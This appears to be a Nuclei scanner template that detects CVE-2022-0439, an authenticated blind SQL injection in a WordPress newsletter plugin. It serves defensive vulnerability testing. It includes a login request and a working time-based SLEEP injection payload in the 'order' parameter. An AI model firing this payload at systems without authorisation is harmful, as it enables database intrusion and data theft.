id: CVE-2022-0439 info: name: Email Subscribers & Newsletters <= 5.3.1 - Authenticated SQL Injection author: Shivam Kamboj severity: high description: | The Email Subscribers & Newsletters WordPress plugin before 5.3.2 does not correctly escape the `order` and `orderby` parameters to the `ajax_fetch_report_list` action, making it vulnerable to blind SQL injection attacks by users with roles as low as Subscriber. Further, it does not have any CSRF protection in place for the action, allowing an attacker to trick any logged in user to perform the action by clicking a link. impact: | Attackers can execute arbitrary SQL commands and access sensitive data, potentially leading to data breach or data tampering. remediation: | Update to version 5.3.2, or a newer patched version reference: - https://nvd.nist.gov/vuln/detail/CVE-2022-0439 - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/email-subscribers/email-subscribers-newsletters-531-authenticated-or-cross-site-request-forgery-blind-sql-injection classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H cvss-score: 8.8 cve-id: CVE-2022-0439 epss-score: 0.20235 epss-percentile: 0.95625 cwe-id: CWE-89 metadata: verified: true max-request: 2 publicwww-query: "/plugins/email-subscribers/" tags: cve,cve2022,wordpress,wp,wp-plugin,sqli,email-subscribers,authenticated,vuln flow: http(1) && http(2) http: - raw: - | POST /wp-login.php HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded log={{username}}&pwd={{password}}&wp-submit=Log+In matchers: - type: dsl dsl: - 'status_code == 302' - 'contains(header, "wordpress_logged_in")' condition: and internal: true - raw: - | @timeout: 20s GET /wp-admin/admin-ajax.php?action=ajax_fetch_report_list&order=,(SELECT+1+FROM+(SELECT(SLEEP(10)))a)--+- HTTP/1.1 Host: {{Hostname}} Accept: application/json matchers: - type: dsl dsl: - 'duration >= 10' - 'status_code == 200' - 'contains(body, "column-email")' condition: and # digest: 4b0a0048304602210080bd9d417d37aaf71bbe427122030446c92cd77bc208bc77cbf2c07a393eb971022100dda8bcb797b86344f239b8f44f5b3849b354953eace4bcb953d901ac15d5b71b:922c64590222798bb761d5b6d8e72950